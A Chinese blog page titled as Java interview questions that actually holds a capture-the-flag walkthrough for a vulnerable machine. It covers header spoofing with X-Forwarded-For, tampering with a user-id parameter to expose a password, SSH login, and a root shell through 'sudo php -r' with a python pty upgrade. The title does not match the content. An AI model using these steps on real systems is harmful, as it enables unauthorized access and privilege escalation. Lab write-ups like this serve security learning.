互联网Java工程师面试题·Java 总结篇·第三弹

笙烛

 关注

阅读 37

2023-10-17

一、信息收集

发现开发了22、80

2.访问ip,右击查看源代码

发现需要利用X-Forwarded-For

火狐插件:X-Forwarded-For Header

挂上代理后:

出现以下页面:

先注册一个账户,然后再登录

发现有参数进行传参

发现传参,参数为5的时候,出现主角alice

查看密码:把type删掉

发现密码是:4lic3

二、漏洞利用

1.ssh连接

账号:alice
密码:4lic3

2.flag1

alice@gfriEND:~$ cd .my_secret/

alice@gfriEND:~/.my_secret$ ls
flag1.txt  my_notes.txt

alice@gfriEND:~/.my_secret$ cat flag1.txt

alice@gfriEND:~/.my_secret$ cat my_notes.txt

三、php回调bash提权

提权网站:

GTFOBins icon-default.png?t=N7T8https://gtfobins.github.io/sudo -l 查看哪些可以sudo提权

可以看到有个php有root权限可以利用

3.flag2


sudo php -r "system('/bin/sh');"

python3 -c 'import pty; pty.spawn("/bin/bash")'  #python交互式shell

相关推荐

互联网Java工程师面试题·Java 面试篇·第三弹

49路末班车 40 0 0

互联网Java工程师面试题·Spring篇·第三弹

有态度的萌狮子 12 0 0

互联网Java工程师面试题·Java 总结篇·第八弹

福福福福福福福福福 22 0 0

互联网Java工程师面试题·Java 面试篇·第一弹

杰森wang 48 0 0

互联网Java工程师面试题·Spring篇·第二弹

诗与泡面 19 0 0

互联网Java工程师面试题·Memcached 篇·第二弹

我阿霆哥 61 0 0

互联网Java工程师面试题·Java 并发编程篇·第五弹

伽马星系 21 0 0

互联网Java工程师面试题·Java 并发编程篇·第七弹

_铁马冰河_ 35 0 0

互联网Java工程师面试题·Spring篇·第一弹

山竹山竹px 23 0 0

互联网Java工程师面试题·Java 总结篇·第十一弹

c一段旅程c 48 0 0

精彩评论(0)

0 0 举报